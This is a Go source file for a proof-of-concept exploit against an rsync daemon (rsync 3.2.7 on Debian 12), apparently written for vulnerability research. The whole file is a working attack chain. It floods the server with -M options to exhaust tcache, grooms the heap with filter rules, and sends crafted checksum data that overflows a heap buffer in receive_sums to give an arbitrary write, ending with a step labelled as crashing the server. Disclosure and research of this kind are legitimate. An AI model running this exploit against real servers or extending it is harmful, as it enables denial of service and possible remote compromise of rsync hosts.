// CLI for a PoC for rsync client -> server memory corruption
package main

import (
	"encoding/binary"
	"fmt"
	"os"
	"strings"

	"cvr.google.com/pkg/client"
	"cvr.google.com/pkg/util"
)

// checksumSeed is the value handed to the server through --checksum-seed.
const checksumSeed = "1337"

// Offsets targeting debian 12 rsync 3.2.7
// sha256sum ab0311a3e8e417aa2f0fd5727f6f5d03c1aedf562a386de03e72faef1e90c1e2
//
// main uses sumBufStructSize to size the groomed filter allocation and, together
// with sumBufOffset, to adjust the address placed in the payload.
const (
	sumBufStructSize = 40
	sumBufOffset     = 0x16
)

// Parameters for the option-spraying loop in main: one batch of -M options is
// sent for every size from tcacheMin to tcacheMax in increments of tcacheStep,
// and each batch contains tcacheSlots*2 options.
const (
	tcacheMin   = 24
	tcacheMax   = 1032
	tcacheStep  = 16
	tcacheSlots = 7
)

// Connection settings passed to client.NewRsyncClient.
var (
	digest          = "sha1"
	protocolVersion = "31"
)

// main runs the proof of concept against the rsync daemon module named by the
// single command-line argument (rsync://<host>:<port>/<module>).
//
// The steps are, in order: connect, send the server-side argument list, set up
// the protocol, send filter rules to shape the heap, read the file list, request
// the first non-empty regular file and finally send the crafted checksum data.
// Any failure is reported on stderr and the process exits with status 1.
func main() {
	if len(os.Args) != 2 {
		fmt.Fprintf(os.Stderr, "Usage: %s rsync://<host>:<port>/<module>\n", os.Args[0])
		os.Exit(1)
	}
	url := os.Args[1]

	if !strings.HasPrefix(url, "rsync://") {
		fmt.Fprintln(os.Stderr, "URL must be in format of rsync://<host>:<port>/<module>")
		os.Exit(1)
	}

	// The connection is named rc so that it does not shadow the client package.
	rc, err := client.NewRsyncClient(url, protocolVersion, digest)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to create client: %v\n", err)
		os.Exit(1)
	}
	if rc == nil {
		fmt.Fprintln(os.Stderr, "Failed to create client: no client returned")
		os.Exit(1)
	}
	fmt.Printf("[*] Connected to %s\n", url)

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc.). If you change something here, make sure to test it.
	args := []string{
		// tell the server that it is supposed to send us the files by making it sender and server
		// the order of --server and --sender is important
		"--server",
		"--sender",

		// set these options to make reading the code easier and to avoid sources of unwanted allocations
		"--compress-choice=zlib",
		"--no-iconv",

		// set the checksum seed. This will make future calculations a little easier
		"--checksum-seed=" + checksumSeed,

		// set --checksum which enables `always_checksum`. This will send us the full checksum
		// of the file before sending the file itself.
		// This is useful for us so that we don't need to download files before performing
		// stack uninitialized data oracles
		"--checksum",

		// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
		// a desync in the protocol depending on compilation options
		"--no-crtimes",
		"--no-atimes",

		// disable some other extra things to prevent the server from sending us extra data
		"--no-owner",
		"--no-group",
		"--no-devices",
		"--no-specials",
		"--no-links",
		"--no-hard-links",
		"--no-acls",

		// disable `inc_recurse` and just send the entire file list at once
		// (--qsort would be an alternative way to disable allow_inc_recurse)
		"--no-inc-recursive",

		// recursively download the module
		"-r",

		// the -e option is followed by . and then different client information options
		// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
		// v sets do_negotiated_strings to true, which means we can force md4 checksums
		"-e.v",
	}

	// Consume all possible entries in tcache
	for size := tcacheMin; size <= tcacheMax; size += tcacheStep {
		for slot := 0; slot < tcacheSlots*2; slot++ {
			args = append(args, "-M-"+strings.Repeat("A", size-2))
		}
	}

	args = append(args,
		// sending a dot line and then a filepath tells the server which files we are requesting
		// in this case, ask for the root of the module
		".",
		"./",

		// empty line to finish sending arguments
		"",
	)

	// The argument list is order-sensitive, so stop at the first line that
	// cannot be sent instead of continuing with a partial list.
	for _, arg := range args {
		if err := rc.WriteLine(arg); err != nil {
			fmt.Fprintf(os.Stderr, "Failed to send arguments: %v\n", err)
			os.Exit(1)
		}
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	if err := rc.SetupProtocol(); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to setup protocol: %v\n", err)
		os.Exit(1)
	}

	fmt.Println("[*] Grooming heap")
	count := 5

	// sendFilter writes one filter rule: its length (including the line
	// terminator) followed by the rule itself.
	// NOTE(review): the result of WriteRawInt, if any, is not checked because its
	// signature is not visible from this file.
	sendFilter := func(rule string) error {
		rc.WriteRawInt(len(rule) + 1)
		return rc.WriteLine(rule)
	}

	filters := []string{
		// The filter pattern is the size we'll allocate in receive_sums
		"+ " + strings.Repeat("Z", count*sumBufStructSize-1),

		// This will allocate a filter_rule after our pattern
		"+ a",

		// Send the clear flag to free filters
		"!",
	}
	for _, rule := range filters {
		if err := sendFilter(rule); err != nil {
			fmt.Fprintf(os.Stderr, "Failed to send filter rules: %v\n", err)
			os.Exit(1)
		}
	}
	// a zero length terminates the filter list
	rc.WriteRawInt(0)

	files, err := rc.ReadFileList()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read file list: %v\n", err)
		os.Exit(1)
	}

	// look for a non-empty regular file; the list may be empty, so nothing is
	// indexed until a match has been found
	targetFileNdx := -1
	for i, file := range files {
		if util.IsReg(file.Mode) && file.Size > 0 {
			targetFileNdx = i
			break
		}
	}

	if targetFileNdx == -1 {
		fmt.Fprintf(os.Stderr, "Did not find a non-empty regular file on the server\n")
		os.Exit(1)
	}
	targetFile := files[targetFileNdx]

	fmt.Printf("[*] Targeting file: %s (index %d)\n", targetFile.Name, targetFileNdx)

	// We are now sending the index of the file that we want to download.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/rsync.c#L322
	if err := rc.WriteNdx(targetFileNdx); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write ndx: %v\n", err)
		os.Exit(1)
	}

	// by setting iflags to ITEM_TRANSFER, rsync does not ask for any more data after this but sends
	// us the file
	iflags := 1 << 15
	if err := rc.WriteShortInt(iflags); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write iflags: %v\n", err)
		os.Exit(1)
	}

	s2len := 64

	// we should now be triggering the Heap overflow!
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L70

	// the first 26 bytes are consumed by padding etc
	payload := make([]byte, 0, s2len)
	payload = append(payload, strings.Repeat("A", 26)...)

	// now comes the flength. Set it to 1337
	payload = binary.LittleEndian.AppendUint64(payload, 1337)

	// we just write 8 bytes in this PoC
	overflowSize := 8
	// target address of the arbitrary write; typed as uint64 so the constant
	// also fits when int is 32 bits wide
	const targetAddr uint64 = 0x4141414141414141

	// we have to adjust for the sum_buf array up to this point
	targetAddrAligned := targetAddr - uint64(sumBufStructSize*count+sumBufOffset)

	payload = binary.LittleEndian.AppendUint64(payload, targetAddrAligned)

	// now comes the count. Set it to count + 1 so that there is an additional sum entry
	payload = binary.LittleEndian.AppendUint32(payload, uint32(count)+1)

	// blength. Set to 1337
	payload = binary.LittleEndian.AppendUint32(payload, 1337)

	// remainder. Set to 0
	payload = binary.LittleEndian.AppendUint32(payload, 0)

	// s2length will now be the size of the arbitrary write.
	payload = binary.LittleEndian.AppendUint32(payload, uint32(overflowSize))

	// pad the rest of the payload with 0x41 up to s2len bytes
	for len(payload) < s2len {
		payload = append(payload, 0x41)
	}

	// NOTE(review): the results of WriteRawInt and Write below, if any, are not
	// checked because their signatures are not visible from this file.

	// first the sum head
	rc.WriteRawInt(count)

	// we can set blength to 1337
	rc.WriteRawInt(1337)

	// now comes s2length which determines overflow size
	rc.WriteRawInt(s2len)

	// let's set the remainder to 0
	rc.WriteRawInt(0)

	for j := 0; j < count; j++ {
		// now comes Sum1
		rc.WriteRawInt(1337)

		// and now the payload
		rc.Write(payload)
	}

	finalPayload := []byte{0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42}

	// finally, we write the actual data for the arbitrary write.
	// one more sum1
	rc.WriteRawInt(1337)

	fmt.Println("[*] Crashing server")
	rc.Write(finalPayload)
}
